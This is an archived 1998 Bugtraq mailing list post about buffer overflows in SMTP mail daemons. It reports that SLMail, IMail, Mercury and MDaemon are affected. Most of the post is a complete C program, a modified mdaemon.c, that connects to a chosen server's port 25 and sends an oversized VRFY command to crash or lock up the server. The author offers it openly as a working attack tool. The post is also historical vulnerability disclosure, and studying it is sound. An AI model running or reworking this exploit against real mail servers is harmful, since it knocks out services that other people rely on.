OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 2nd quarter (Apr-Jun) 1998: smtp overflows

smtp overflows

Jon Beaton (stevenEFNI.COM)
Wed, 8 Apr 1998 07:10:25 -0400 

There have been more posts about the buffer overflows on smtp daemons,
so I thought this may be useful. After posting about these attacks on
SLMail and Imail, I found that there were alot more that were still
affected. On the few I've tried on the Mac, like Mercury, it had locked
the server up, much like Appleshare. Anyways, this is just mdaemon.c
with just a few tiny changes, just thought it may be useful. Btw, I just
wanted to note that this will also crash IMail, even though the author
has said it wasn't affected.

Jon


/*
mdaemon.c with a few small changes.
known to lock up the whole server with some daemons on the Mac

Cisc0  Undernet
*/

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

 void main(int argc, char *argv[])
 {
   struct sockaddr_in sin;
   struct hostent *hp;
   char *buffer;
   int sock, i;

   if (argc != 2) {
     printf("usage: %s <smtp server>\n", argv[0]);
     exit(1);
   }
   hp = gethostbyname(argv[1]);
   if (hp==NULL) {
     printf("Unknown host: %s\n",argv[1]);
     exit(1);
   }
   bzero((char*) &sin, sizeof(sin));
   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
   sin.sin_family = hp->h_addrtype;
   sin.sin_port = htons(25);
   sock = socket(AF_INET, SOCK_STREAM, 0);
   connect(sock,(struct sockaddr *) &sin, sizeof(sin));
   buffer = (char *)malloc(1000);
   sprintf(buffer, "VRFY ");
   for (i = 0; i<896; i++)
     strcat(buffer, "d");
   strcat(buffer, "\r\n");
   write(sock, &buffer[0], strlen(buffer));
   close(sock);
   free(buffer);
 }